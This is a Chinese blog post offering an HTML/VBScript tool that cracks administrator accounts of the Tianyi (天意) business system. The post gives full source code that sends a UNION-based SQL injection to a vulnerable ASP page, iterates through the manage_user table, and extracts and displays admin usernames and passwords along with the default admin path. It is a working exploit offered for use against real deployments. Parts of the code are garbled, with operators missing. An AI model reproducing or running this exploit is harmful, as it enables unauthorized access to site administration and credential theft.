天意商务系统后台管理帐号破解html版

/**
慈勤强
http://blog.csdn.net/cqq
*/
自从上次写了个天意商务系统破解程序之后，
收到了不少朋友的来信，
有询问程序原理的，有询问如何防护的。
今天，我抽了一点时间，做了这个Html版，就只有这一个htm文件
相信有点html知识和SQL Injection知识的朋友都能够看懂
原理非常简单，破解用户帐号是用的SQL Injection方法，
因为这套系统好多地方存在sql injection漏洞，
然后自己下载个这套系统，就可以很方便的找出问题了。
以前是Vc++版本，现在是html版本，不过都是一样，
就是通过http协议取得网页的源文件
然后分析源文件，找到用户名和密码
并且显示出来。
下面是源代码，大家只要把这个文件保存到硬盘上，起名叫ty.htm，就可以了。

天意商务系统后台管理帐号破解html版--慈勤强制作

Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode ""
strPara = "/wlyx/show_cgal.asp?newsid=1%20and%201=2%20union%20select%201,username%2b'***'%2bpassword,3,4,5,6%20from%20manage_user%20where%20username>'" + strUser + "'%20union%20select%20*%20from%20cgal%20where%201=2"
Set xmlhttp = CreateObject("Microsoft.XMLHTTP")
xmlhttp.open "GET",(strUrl + strPara),false
xmlhttp.send
strAAA=getMid(bytes2BSTR(xmlhttp.ResponseBody), "", "")
If Trim(strAAA) "" Then
arr = Split(strAAA, "***")
strUser = arr(0)
strCqq = strCqq + vbNewLine + "用户名：" + strUser + vbNewLine + "密 码：" + arr(1) + vbNewLine + vbNewLine
Else
strUser = ""
End If

//msgbox xmlhttp.Response
Set xmlhttp = Nothing
Wend
If strCqq"" Then
strCqq="破解的后台管理帐号为：（后台默认地址："+strUrl+"/admin）"+vbCrLF+VBCRLF+strCqq+vbnewline
cqqadmin.innerText=strCqq
Else
cqqadmin.innerText="出错"
End If

End Sub
Function getMid(str, str1, str2)
str11 = ""
i = InStr(str, str1)
If i > 0 Then
j = InStr(i, str, str2)
If j > 0 Then
str11 = Mid(str, i + Len(str1), j - i - Len(str1))
End If
End If
getMid = str11
End Function

[Ctrl+A 全选 注:如需引入外部Js需刷新才能执行]